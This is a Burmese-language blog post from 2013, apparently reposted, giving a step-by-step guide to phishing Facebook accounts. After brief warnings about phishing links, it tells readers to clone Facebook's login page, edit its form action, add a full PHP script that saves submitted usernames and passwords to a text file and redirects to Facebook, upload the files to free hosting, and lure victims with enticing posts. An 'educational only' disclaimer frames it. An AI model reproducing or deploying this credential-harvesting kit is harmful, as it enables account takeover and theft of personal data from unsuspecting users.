Saturday, November 30, 2013

ဖေ့ဘုတ် အကောင့်ပေါင်းများစွာကို Phishing နည်းနဲ့ ဘယ်လို Hack ကြမလဲ




ဖေ့ဘုတ်ဆိုတာကတော့ အခုနောက်ပိုင်း မြန်မာပြည်မှာ ရေပန်းစားလာပြီးတော့ အသုံးများလာတာဖြစ်ကြပါတယ်။တကယ်လို့ အကြောင်းတစ်စုံတစ်ရာကြောင့် Hack ချင်သူတွေ အတွက် တင်ပေးလိုက်ပါတယ်။ကျွန်တော်က Ethical Hacking Tutorials မှာ တက်ရောက်နေတာဆိုတော့ သူငယ်ချင်းများအားလုံးကို အသိပေးချင်တာဖြစ်ပါတယ်။ပြီးတော့ ဒီလို Phishing တွေကို ရှောင်ရှားနိုင်ဖို့နဲ့ နားလည်နိုင်ဖို့ တင်ပေးတာပါ။

သတိပေးချင်တာကတော့ 
ကျွန်တော် ဒီနည်းလမ်းကို Educational only သင်ပေးတာဖြစ်ပြီးတော့ အခြားမကောင်းတဲ့နေရာတွေမှာ အသုံးချတာမျိုးမပြုလုပ်ကြပါနဲ့။

အရင်ဆုံး Phishing နည်းနဲ့ Facebook အကောင့်ကို ဘယ်လိုဖမ်းတတ်ကြသလဲ
(၁) သင့်ကို စိတ်ဝင်စားစေမယ့် ၀က်ဆိုဒ်တစ်ခုကို ဆွဲခေါ်သွားမယ်
(၂) အဲဒီရောက်ရင် သင်ဖေ့ဘုတ်ဖွင့်ထားရင်တောင် သင့်ဖေ့ဘုတ်အကောင့်ကို Log in လုပ်ခိုင်းမယ်
(၃) သင် log in လုပ်လိုက်တာနဲ့ သင့် အချက်အလက်တွေအားလုံး(ပက့်ဝါ့၊ဖုန်းနံပါတ်၊လိပ်စာ၊Ad အကောင့်မှအစ)အားလုံး ရရှိနိုင်ပါတယ်။

သတိပေးချင်တာကတော့ လုံးဝ မင်္သကာရင် ၀င်မကြည့်ပါနဲ့။အကောင့် ဖွင့်ထားရက်နဲ့ ထပ်ဝင်ခိုင်းရင် မ၀င်ပါနဲ့။Log in with Facebook ခလုတ်တွေ့ရင် မနှိပ်ပါနဲ့။အခုနောက်ပိုင်း လော့အင် ၀င်စရာမလိုဘဲနဲ့ ခလုပ်နှိပ်တာနဲ့ ရနိုင်တဲ့ နည်းတွေရှိပါတယ်။

ဒီလိုနည်းနဲ့ ဘယ်လို Hack ကြမလဲ
ပထမဆုံး ဖေ့ဘုတ်ရဲ့ လော့အင် ၀င်တဲ့နေရာကိုသွားပါ။
(လော့အင် မ၀င်ပါနဲ့)

ပြီးရင် Right Click နှိပ်ပြီးတော့ view page source ကိုနှိပ်ပါ။စာလုံးတွေ အများကြီးပေါ်လာပါလိမ့်မယ်။Select all လုပ်ပြီး Note pad ထဲမှာ Paste လုပ်ပါ။
(Note Pad ပါ။Word Pad မဟုတ်ပါ)

ပြီးရင်တော့ Note pad ထဲမှာ Ctrl+f နှိပ်ပြီးတော့ ဘောက်စ်ပေါ်လာရင် action လို့နှိပ်ပြီးရှာပါ။အဲဒီနေရာလေး အစိမ်းရောင်လေးလင်းနေပါလိမ့်မယ်။Action တွေ့ပြီဆိုရင်တော့ "https//www.facebook.com" ဆိုတာကို ဖျက်လိုက်ပါ။ပြီးရင် အဲဒီ Note Pad ကို UTF-8 Format ပြောင်းပြီးတော့ ဖိုင် အမျိုးအစားကတော့ all file နာမည်ကိုတော့ index.html လို့နာမည်ပေးပြီး Save လိုက်ပါ။

ပြီးရင် Note Pad ပြန်ဖွင့်ပါ။အောက်မှာ ရေးထားတဲ့ စာတွေကို Copy လုပ်ပြီး Paste ပြန်ချပါ။

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

ပြီးရင် ခုနကအတိုင်း လုပ်ပြီး နာမည်ကိုတော့ login.php လို့ အမည်ပေးပြီး Save လိုက်ပါ။

Note Pad ပြန်ဖွင့်ပါ။ဘာမှမေ၇းပါနဲ့။Save လုပ်ပြီး နာမည်ကိုတော့ pswrds လို့ရေးပြီး အမျိုးအစားကိုတော့ .txt ပုံစံနဲ့ပဲ save ပါ။

ပြီးရင် Free Hosting Site တွေကို သွားပါ။Host လုပ်ပြီးတော့ ဒီ ဖိုင်သုံးခုကို Upload လုပ်လိုက်ပါ။ပြီးရင်တော့ Host မှာ တစ်ခုခုရေးပါ။

လူတစ်ယောက်ကိုဖမ်းချင်ရင်တော့ စိတ်ဝင်စားဖို့ကောင်းတဲ့ စာသားတွေရေး ကိုယ့် Phishing ဆိုဒ်ရဲ့ လင့်ကိုပေးပြီးတော့ ဖေ့ဘုတ်မှာပဲဖြစ်ဖြစ် ပို့စ်တင်ပါ။အဲဒီလူစိတ်ဝင်စားပြီးတော့ လိုက်လာရင် ဖမ်းမိပြီပေါ့။

သူ log in လုပ်လိုက်တာနဲ့ သင့်ရဲ့ pswrds မှာ လှို့ဝှက်နံပါတ်တွေ ပေါ်လာပါလိမ့်မယ်။

မရှင်းတာရှိရင်မေးပါ။တကယ်လို့ မလုပ်တတ်ဘူးဆိုရင်လဲ အသင့်လုပ်ပြီးသားလေးတွေ နမူနာပြပါမယ်။

ပြည်တွင်းက Phishing ဆိုဒ်တစ်ခုကိုလဲ နမူနာပြပေးလိုက်ပါတယ်။လုံးဝ log in မလုပ်ပါနဲ့။
Knowledge sharing သက်သက်ပါ။သုတက အကိုတွေ၊အမတွေ လေ့လာမှတ်သားနိုင်အောင် တင်ပေးလိုက်တာပါ။မကောင်းတဲ့ရည်ရွယ်ချက်နဲ့တော့ အသုံးမပြုကြပါနဲ့လို့ မေတ္တာ၇ပ်ခံပါရစေ

မောင်စိုင်း
(P.S တချို့သူတွေ မောင်စိုင်း နာမည်ကို အသုံးပြုပြီးတော့ နိုင်ငံရေးဆန်ဆန်စာတွေ ရေးနေပါသည်။မောင်စိုင်း နိုင်ငံရေး ဆန်ဆန်စာတွေ မရေးပါ။နာမည် အလွဲသုံးချခံရခြင်းဖြစ်ပါသည်။)


Sai Khon ၏ပိုစ့်ကိုကူးယူဖော်ပြပါသည်။

1 comment:

  1. အကိုယ့် ph လေးတစ်ချက်လောက်ပြောပြလို့ရမလား



    ReplyDelete